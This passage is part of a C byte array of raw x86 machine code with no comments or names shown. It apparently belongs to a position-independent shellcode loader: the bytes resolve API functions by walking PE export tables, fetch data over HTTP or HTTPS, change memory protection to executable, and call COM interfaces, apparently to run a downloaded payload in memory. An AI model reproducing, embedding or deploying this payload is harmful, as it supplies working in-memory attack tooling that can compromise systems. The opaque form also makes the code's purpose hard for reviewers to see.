111 0x61, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
112 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xbc,
113 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed,
114 0x74, 0x49, 0xbf, 0xa4, 0x14, 0x40, 0x00, 0xbb, 0x98, 0x14, 0x40, 0x00,
115 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
116 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x7e, 0x15,
117 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55,
118 0xe8, 0x0c, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10,
119 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0,
120 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51,
121 0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x4c, 0x03, 0x00, 0x00,
122 0x50, 0xff, 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9,
123 0xc5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x5c, 0x03, 0x00, 0x00,
124 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa,
125 0x00, 0x00, 0x00, 0xbf, 0xda, 0x2a, 0x40, 0x00, 0x81, 0xef, 0x0e, 0x14,
126 0x40, 0x00, 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18,
127 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84,
128 0x85, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xf2, 0x14, 0x00, 0x00, 0xb9, 0x0e,
129 0x14, 0x40, 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50,
130 0x55, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24,
131 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d,
132 0x86, 0x7c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8,
133 0x85, 0xed, 0x74, 0x49, 0xbf, 0xd1, 0x2a, 0x40, 0x00, 0xbb, 0xc2, 0x2a,
134 0x40, 0x00, 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
135 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8,
136 0x98, 0x14, 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3,
137 0x50, 0x55, 0xe8, 0x26, 0x17, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
138 0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48,
139 0x33, 0xc0, 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59,
140 0xc3, 0x81, 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c,
141 0x5f, 0x33, 0xf6, 0x8d, 0x44, 0x24, 0x28, 0x57, 0x56, 0x50, 0x89, 0x74,
142 0x24, 0x20, 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x09, 0x17, 0x00, 0x00,
143 0x8d, 0x44, 0x24, 0x70, 0x89, 0x7c, 0x24, 0x34, 0x8b, 0xbc, 0x24, 0x74,
144 0x02, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84,
145 0x24, 0x64, 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01,
146 0x00, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44,
147 0x24, 0x28, 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x56, 0x8d, 0x87, 0x10,
148 0x05, 0x00, 0x00, 0x50, 0xff, 0x57, 0x7c, 0x85, 0xc0, 0x0f, 0x84, 0xb4,
149 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x56, 0x56,
150 0x0f, 0x94, 0xc0, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xb8, 0x00, 0x32, 0xe0,
151 0x84, 0x56, 0x56, 0x0f, 0x44, 0xd8, 0xff, 0x97, 0x80, 0x00, 0x00, 0x00,
152 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x24, 0x85, 0xc9, 0x0f, 0x84, 0x85, 0x01,
153 0x00, 0x00, 0x39, 0x74, 0x24, 0x10, 0xba, 0xbb, 0x01, 0x00, 0x00, 0x56,
154 0x56, 0x6a, 0x03, 0x56, 0x56, 0x6a, 0x50, 0x58, 0x0f, 0x45, 0xc2, 0x0f,
155 0xb7, 0xc0, 0x50, 0x8d, 0x44, 0x24, 0x7c, 0x50, 0x51, 0xff, 0x97, 0x84,
156 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f,
157 0x84, 0xfb, 0x00, 0x00, 0x00, 0x55, 0x56, 0x53, 0x56, 0x56, 0x56, 0x8d,
158 0x84, 0x24, 0x7c, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x10, 0x06, 0x00,
159 0x00, 0x50, 0x51, 0xff, 0x97, 0x94, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85,
160 0xed, 0x0f, 0x84, 0xca, 0x00, 0x00, 0x00, 0x39, 0x74, 0x24, 0x14, 0x74,
161 0x20, 0xf7, 0xc3, 0x00, 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d,
162 0x44, 0x24, 0x20, 0xc7, 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50,
163 0x6a, 0x1f, 0x55, 0xff, 0x97, 0x88, 0x00, 0x00, 0x00, 0x56, 0x56, 0x56,
164 0x56, 0x55, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
165 0x8a, 0x00, 0x00, 0x00, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24,
166 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x68,
167 0x13, 0x00, 0x00, 0x20, 0x55, 0xff, 0x97, 0x9c, 0x00, 0x00, 0x00, 0x85,
168 0xc0, 0x74, 0x67, 0x81, 0x7c, 0x24, 0x18, 0xc8, 0x00, 0x00, 0x00, 0x75,
169 0x5d, 0x56, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00,
170 0x00, 0x00, 0x50, 0x8d, 0x9f, 0x40, 0x07, 0x00, 0x00, 0x53, 0x68, 0x05,
171 0x00, 0x00, 0x20, 0x55, 0x89, 0x33, 0x89, 0x73, 0x04, 0xff, 0x97, 0x9c,
172 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04,
173 0x74, 0x2c, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x56,
174 0xff, 0x57, 0x3c, 0x89, 0x87, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74,
175 0x15, 0x8d, 0x4c, 0x24, 0x20, 0x89, 0x74, 0x24, 0x20, 0x51, 0xff, 0x33,
176 0x50, 0x55, 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0xf0, 0x55, 0xff,
177 0x97, 0x90, 0x00, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90,
178 0x00, 0x00, 0x00, 0x5d, 0xff, 0x74, 0x24, 0x24, 0xff, 0x97, 0x90, 0x00,
179 0x00, 0x00, 0x85, 0xf6, 0x74, 0x45, 0xff, 0xb7, 0x40, 0x07, 0x00, 0x00,
180 0x8b, 0x9f, 0x48, 0x07, 0x00, 0x00, 0x8d, 0x87, 0x30, 0x07, 0x00, 0x00,
181 0x53, 0x50, 0x8d, 0x87, 0x20, 0x07, 0x00, 0x00, 0x50, 0xe8, 0x0e, 0x14,
182 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8d, 0x87, 0x18, 0x06, 0x00, 0x00, 0xff,
183 0x77, 0x28, 0x50, 0xe8, 0xd7, 0x12, 0x00, 0x00, 0x83, 0xc4, 0x1c, 0x3b,
184 0x83, 0x08, 0x19, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x93, 0x0c, 0x19, 0x00,
185 0x00, 0x75, 0x04, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5e, 0x5b,
186 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0xdc, 0x01, 0x00,
187 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00, 0x57,
188 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78, 0x85, 0xc0, 0x0f, 0x84, 0xe5,
189 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b, 0x5f, 0x18, 0x85, 0xdb, 0x0f,
190 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33, 0xd2, 0x03, 0xc6,
191 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x24, 0x8b, 0x47, 0x20, 0x03,
192 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47, 0x24, 0x03, 0xc6, 0x89, 0x44,
193 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6, 0x8a, 0x08, 0x84, 0xc9, 0x74,
194 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94, 0x24, 0xe8, 0x00, 0x00, 0x00,
195 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88, 0x0c, 0x02, 0x40, 0x8a, 0x08,
196 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24, 0x10, 0x8b, 0xb4, 0x24, 0xf4,
197 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
198 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x84, 0x14,
199 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00,
200 0x50, 0xe8, 0x0d, 0x12, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24, 0x83, 0xc4,
201 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc, 0x89, 0x54, 0x24, 0x1c,
202 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff, 0xb4, 0x24, 0x04, 0x02,
203 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x03,
204 0xce, 0x51, 0xe8, 0xdc, 0x11, 0x00, 0x00, 0x33, 0x44, 0x24, 0x24, 0x83,
205 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84, 0x24, 0xf8, 0x01, 0x00,
206 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01, 0x00, 0x00, 0x74, 0x1d,
207 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89, 0x44, 0x24, 0x10, 0x83,
208 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4,
209 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x8b, 0x4c, 0x24,
210 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b, 0x0c, 0x81, 0x03, 0xce, 0x3b,
211 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c, 0x03, 0xc7, 0x3b, 0xc8, 0x73,
212 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e, 0x8d, 0x7c, 0x24, 0x28, 0x8b,
213 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73, 0x11, 0x8a, 0x06, 0x88, 0x04,
214 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42, 0x46, 0x80, 0x3e, 0x00, 0x75,
215 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c, 0x6c, 0x00, 0x42, 0x03, 0xca,
216 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d, 0x74, 0x24, 0x68, 0x2b, 0xf1,
217 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41,
218 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4, 0x24, 0xf0, 0x01, 0x00, 0x00,
219 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44, 0x14, 0x6c, 0x00, 0xff, 0x56,
220 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c, 0x24, 0x68, 0x51, 0x50, 0xff,
221 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x8b, 0xc1, 0xe9, 0x5b,
222 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b,
223 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
224 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
225 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c, 0x8b, 0x4e, 0x14, 0x85, 0xc9,
226 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x14, 0x8b,
227 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
228 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01,
229 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c, 0x8b, 0x4e, 0x08, 0x85, 0xc9,
230 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x2c, 0x8b, 0x46, 0x08, 0x50,
231 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e, 0x08, 0x8b, 0x4e, 0x04, 0x85,
232 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x04,
233 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08,
234 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83, 0xc0, 0x10,
235 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, 0x00, 0xb8, 0x01, 0x40, 0x00,
236 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x10, 0x00,
237 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x8b, 0x44, 0x24, 0x04,
238 0xff, 0x74, 0x24, 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff,
239 0x74, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00,
240 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24,
241 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16,
242 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff,
243 0x51, 0x04, 0x8b, 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2,
244 0x10, 0x00, 0x8b, 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03,
245 0x40, 0x00, 0x80, 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33,
246 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45,
247 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75,
248 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff,
249 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x42, 0x0f,
250 0x00, 0x00, 0x8b, 0x74, 0x24, 0x14, 0xb9, 0x13, 0x1e, 0x40, 0x00, 0xbf,
251 0xe4, 0x2a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08,
252 0xe8, 0x27, 0x0f, 0x00, 0x00, 0xb9, 0xe5, 0x1a, 0x40, 0x00, 0x2b, 0xcf,
253 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x14, 0x0f, 0x00, 0x00,
254 0xb9, 0x9c, 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
255 0x48, 0x08, 0xe8, 0x01, 0x0f, 0x00, 0x00, 0xb9, 0x5a, 0x1b, 0x40, 0x00,
256 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xee, 0x0e,
257 0x00, 0x00, 0xb9, 0x30, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
258 0x06, 0x89, 0x48, 0x10, 0xe8, 0xdb, 0x0e, 0x00, 0x00, 0xb9, 0x0c, 0x1b,
259 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8,
260 0xc8, 0x0e, 0x00, 0x00, 0xb9, 0x74, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
261 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8, 0xb5, 0x0e, 0x00, 0x00, 0xb9,
262 0x71, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
263 0x1c, 0xe8, 0xa2, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
264 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x8f, 0x0e, 0x00,
265 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
266 0x89, 0x48, 0x24, 0xe8, 0x7c, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
267 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x28, 0xe8, 0x69,
268 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
269 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0x56, 0x0e, 0x00, 0x00, 0xb9, 0x04,
270 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x30,
271 0xe8, 0x43, 0x0e, 0x00, 0x00, 0xb9, 0x84, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
272 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34, 0xe8, 0x30, 0x0e, 0x00, 0x00,
273 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
274 0x48, 0x38, 0xe8, 0x1d, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
275 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x3c, 0xe8, 0x0a, 0x0e,
276 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
277 0x06, 0x89, 0x48, 0x40, 0xe8, 0xf7, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
278 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x44, 0xe8,
279 0xe4, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
280 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8, 0xd1, 0x0d, 0x00, 0x00, 0xb9,
281 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
282 0x4c, 0xe8, 0xbe, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
283 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x50, 0xe8, 0xab, 0x0d, 0x00,
284 0x00, 0xb9, 0xfc, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
285 0x89, 0x48, 0x54, 0xe8, 0x98, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
286 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x58, 0xe8, 0x85,
287 0x0d, 0x00, 0x00, 0xb9, 0x28, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
288 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0x72, 0x0d, 0x00, 0x00, 0xb9, 0x04,
289 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x60,
290 0xe8, 0x5f, 0x0d, 0x00, 0x00, 0xb9, 0xac, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
291 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64, 0xe8, 0x4c, 0x0d, 0x00, 0x00,
292 0xb9, 0xf4, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
293 0x48, 0x68, 0xe8, 0x39, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
294 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x6c, 0xe8, 0x26, 0x0d,
295 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
296 0x06, 0x89, 0x48, 0x70, 0xe8, 0x13, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
297 0x40, 0x00, 0x8d, 0x5e, 0x04, 0x2b, 0xcf, 0x8b, 0x7c, 0x24, 0x10, 0x03,
298 0xc8, 0x8b, 0x06, 0x53, 0x89, 0x48, 0x74, 0x8d, 0x87, 0xdc, 0x03, 0x00,
299 0x00, 0x83, 0x66, 0x10, 0x00, 0x50, 0x89, 0x7e, 0x14, 0xff, 0x57, 0x78,
300 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87,
301 0x8c, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f,
302 0x5e, 0x5b, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8,
303 0x03, 0x40, 0x00, 0x80, 0xeb, 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33,
304 0xc9, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84,
305 0x8f, 0xfc, 0x03, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83,
306 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x0c,
307 0x04, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04,
308 0x75, 0xee, 0xeb, 0x14, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x8c, 0x04, 0x00,
309 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee,
310 0x89, 0x32, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40,
311 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04,
312 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08,
313 0xff, 0x51, 0x38, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04,
314 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00,
315 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff,
316 0x50, 0x4c, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x83, 0xec, 0x14, 0x53, 0x8b,
317 0x5c, 0x24, 0x1c, 0x55, 0x56, 0x57, 0x33, 0xff, 0x8d, 0xab, 0x48, 0x07,
318 0x00, 0x00, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8b, 0xc7, 0x89,
319 0x7c, 0x24, 0x10, 0x74, 0x03, 0x8b, 0x6d, 0x00, 0x8b, 0x8b, 0xa4, 0x00,
320 0x00, 0x00, 0x8b, 0x74, 0x24, 0x2c, 0x85, 0xc9, 0x0f, 0x84, 0xc5, 0x01,
321 0x00, 0x00, 0x56, 0x8d, 0x83, 0x2c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83,
322 0x1c, 0x04, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0x89,
323 0x01, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x7e, 0x04, 0x57, 0x8d, 0x83, 0x3c,
324 0x04, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x8d, 0x45, 0x04, 0x50, 0x52, 0xff,
325 0x51, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0x62, 0x01, 0x00, 0x00, 0x8b, 0x07,
326 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
327 0xc0, 0x0f, 0x88, 0x5c, 0x01, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x14, 0x00,
328 0x74, 0x1a, 0x8b, 0x0f, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x83, 0x5c, 0x04,
329 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83, 0x4c, 0x04, 0x00, 0x00, 0x50,
330 0x51, 0xff, 0x52, 0x24, 0x33, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x33, 0x01,
331 0x00, 0x00, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
332 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00, 0x00, 0x8d, 0x85, 0x04, 0x02, 0x00,
333 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0x56, 0x08, 0x8b, 0xf8, 0x8d, 0x46,
334 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0x89, 0x44, 0x24, 0x28,
335 0xff, 0x51, 0x30, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x85, 0xf6, 0x0f,
336 0x88, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x18, 0x8b, 0x74, 0x24,
337 0x2c, 0x8b, 0x12, 0x8d, 0x46, 0x10, 0x50, 0x8d, 0x83, 0x6c, 0x04, 0x00,
